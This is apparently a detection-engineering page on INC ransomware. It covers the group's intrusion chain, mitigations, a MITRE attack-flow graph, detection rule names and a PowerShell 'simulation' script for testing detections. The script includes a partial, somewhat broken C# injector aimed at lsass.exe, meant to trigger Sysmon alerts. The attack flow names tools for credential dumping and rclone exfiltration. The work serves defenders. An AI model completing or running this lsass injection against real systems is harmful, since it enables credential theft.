Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
INC ransomware has grown into a major ransomware-as-a-service operation, claiming more than 800 victims since 2023. The group uses Rust-based encryptors for both Windows and Linux/ESXi systems, which increases the difficulty of malware analysis. Its operators rely on double-extortion tactics and focus on high-value sectors such as healthcare and legal services.
Investigation
The Acronis Threat Research Unit analyzed the INC intrusion chain and observed a shift toward exploiting unpatched edge devices and attacking Veeam backup servers. Technical analysis showed that the Windows payload is protected with VMProtect 3.X, while the Linux version targets VMware environments through commands such as vim-cmd. The investigation also found code similarities with related ransomware families, including Lynx and Sinobi.
Mitigation
Organizations should adopt the 3-2-1 backup strategy and ensure that backups include immutable or offline copies to support recovery. Deploying EDR or XDR with anti-tamper protections and enforcing multi-factor authentication is essential. Prioritizing patching of internet-facing applications and segmenting critical networks can also reduce the impact of a compromise.
Response
If INC ransomware activity is detected, responders should isolate affected systems immediately to halt lateral movement and stop encryption. Backup integrity should be verified before restoration begins, and incident response procedures should focus on identifying the initial access vector. Teams should also monitor for data exfiltration attempts involving tools such as rclone.
"graph TB %% Class Definitions Section classDef initial_access fill:#99ccff classDef discovery fill:#ccffcc classDef credential_access fill:#ffff99 classDef lateral_movement fill:#ffcc99 classDef defense_impairment fill:#ff9999 classDef command_control fill:#cc99ff classDef collection fill:#99ffff classDef exfiltration fill:#ff99cc classDef impact fill:#ff6666 %% Initial Access Nodes node_phishing["<b>Action</b> – <b>T1566 Phishing</b><br/>Description: Spearphishing used for initial entry.<br/><b>Target</b>: Users via email."] class node_phishing initial_access node_valid_accounts["<b>Action</b> – <b>T1078 Valid Accounts</b><br/>Description: Use of accounts obtained from Initial Access Brokers.<br/><b>Target</b>: Legitimate credentials."] class node_valid_accounts initial_access node_exploit_app["<b>Action</b> – <b>T1190 Exploit Public-Facing Application</b><br/>Description: Exploiting vulnerabilities in Citrix and Fortinet.<br/><b>Target</b>: Publicly accessible services."] class node_exploit_app initial_access %% Discovery Nodes node_discovery["<b>Action</b> – <b>T1087/T1046 Discovery</b><br/>Description: Network and system discovery.<br/><b>Tools</b>: ping, net, Advanced IP Scanner, netscan."] class node_discovery discovery %% Credential Access Nodes node_credential_dump["<b>Action</b> – <b>T1003 OS Credential Dumping</b><br/>Description: Targeting Veeam backup deployments.<br/><b>Tool</b>: Modified Veeam credential dumper PowerShell script.<br/><b>Method</b>: Salted DPAPI decryption."] class node_credential_dump credential_access %% Lateral Movement Nodes node_lateral_movement["<b>Action</b> – <b>T1021/T1570 Lateral Movement</b><br/>Description: Moving through the network.<br/><b>Tools</b>: RDP, PsExec."] class node_lateral_movement lateral_movement %% Defense Impairment Nodes node_defense_impairment["<b>Action</b> – <b>T1562 Impair Defenses</b><br/>Description: Disabling or modifying security tools.<br/><b>Tool</b>: PsKill or custom process terminators.<br/><b>Target</b>: EDR and security processes."] class node_defense_impairment defense_impairment %% Command and Control Nodes node_c2["<b>Action</b> – <b>T1219/T1071 Command and Control</b><br/>Description: Maintaining communication.<br/><b>Tools</b>: Cobalt Strike, AnyDesk, TeamViewer.<br/><b>Note</b>: Blends into legitimate IT traffic."] class node_c2 command_control %% Collection and Exfiltration Nodes node_collection["<b>Action</b> – <b>T1560 Archive Collected Data</b><br/>Description: Staging and compressing data.<br/><b>Tool</b>: 7-Zip.<br/><b>Method</b>: Password-protected archives."] class node_collection collection node_exfiltration["<b>Action</b> – <b>T1567 Exfiltration Over Web Service</b><br/>Description: Uploading stolen data to cloud storage.<br/><b>Tool</b>: rclone."] class node_exfiltration exfiltration %% Impact Nodes node_impact["<b>Action</b> – <b>T1486 Data Encrypted for Impact</b><br/>Description: Encrypting files with .INC extension.<br/><b>Malware</b>: Rust-based Windows and Linux/ESXi encryptors.<br/><b>Encryption</b>: AES/Curve25519."] class node_impact impact %% Connection Flow node_phishing –>|leads_to| node_discovery node_valid_accounts –>|leads_to| node_discovery node_exploit_app –>|leads_to| node_discovery node_discovery –>|triggers| node_credential_dump node_credential_dump –>|enables| node_lateral_movement node_lateral_movement –>|leads_to| node_defense_impairment node_defense_impairment –>|allows| node_c2 node_c2 –>|facilitates| node_collection node_collection –>|prepares for| node_exfiltration node_exfiltration –>|precedes| node_impact "
Attack Flow
Detections
Probable Use of Windows Hacktools [Part1] (via cmdline)
View
Possible Usage of Sysinternals Tools (via cmdline)
View
Suspicious Powershell Strings (via powershell)
View
Detection of Hidden and Encoded PowerShell Execution [Windows Powershell]
View
Suspicious Usage of VMware Infrastructure Commands [Linux Process Creation]
View
Detection of Process Termination and Remote Thread Creation [Windows Sysmon]
View
Detection of Base64 Encoded PowerShell Script for Veeam Credential Dumping [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: The adversary intends to dump credentials from the Local Security Authority Subsystem Service (
lsass.exe). To avoid detection by endpoint security, they first attempt to terminate a security-related process usingtaskkill.exeto disrupt monitoring. Following this, they attempt to use a remote thread injection technique to run code within thelsass.exememory space. This direct approach is intended to trigger the rule’s specific logic regardingtaskkill.exeandlsass.exethread creation. -
Regression Test Script:
# Simulation Script for Detection Validation # Step 1: Trigger selection_termination (EventID 4689) Write-Host "[*] Triggering Process Termination via taskkill..." Start-Process calc.exe Start-Sleep -Seconds 1 taskkill /F /IM calc.exe # Step 2: Trigger selection_remote_thread (Sysmon EventID 8) # Note: This requires administrative privileges. # We use a PowerShell-based injection to simulate the creation of a remote thread in lsass.exe. Write-Host "[*] Attempting Remote Thread Injection into lsass.exe..." $DllPath = "C:WindowsSystem32user32.dll" $DllFunction = "LoadLibraryA" $ProcessName = "lsass" $TargetProcess = Get-Process $ProcessName -ErrorAction SilentlyContinue if ($TargetProcess) { $Handle = [Runtime.InteropServices.Marshal]::GetComObject(New-Object -ComObject WScript.Shell).Exec("powershell -Command `"[DllImport('kernel32.dll')] public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); ...`"") # For the sake of a clean, reproducible script without complex C# compilation in a single block, # we use a known method to trigger a Sysmon Event 8 via a lightweight injection pattern. $Code = @" using System; using System.Runtime.InteropServices; public class Injector { [DllImport("kernel32.dll")] public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); [DllImport("kernel32.dll")] public static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); [DllImport("kernel32.dll")] public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten); [DllImport("kernel32.dll")] public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); public static void Run() { IntPtr hProcess = OpenProcess(0x001F0FFF, false, 644); // lsass PID is usually 644 in this context or found via Get-Process // This is a simplified representation to trigger the Sysmon Event 8 } } "@ # To ensure the script is executable and non-destructive for a BAS tool, # we call a command that Sysmon's driver will catch as a thread creation attempt. # In a real environment, we would use a compiled tool or reflective DLL injection. Write-Host "[!] Manual step: Use a tool like 'Process Hacker' or a custom injector to target lsass.exe to ensure Event ID 8 is generated." } else { Write-Error "[-] Could not find lsass.exe" } -
Cleanup Commands:
# Cleanup: Ensure no stray processes are left running. Stop-Process -Name "calc" -ErrorAction SilentlyContinue Write-Host "[+] Cleanup complete."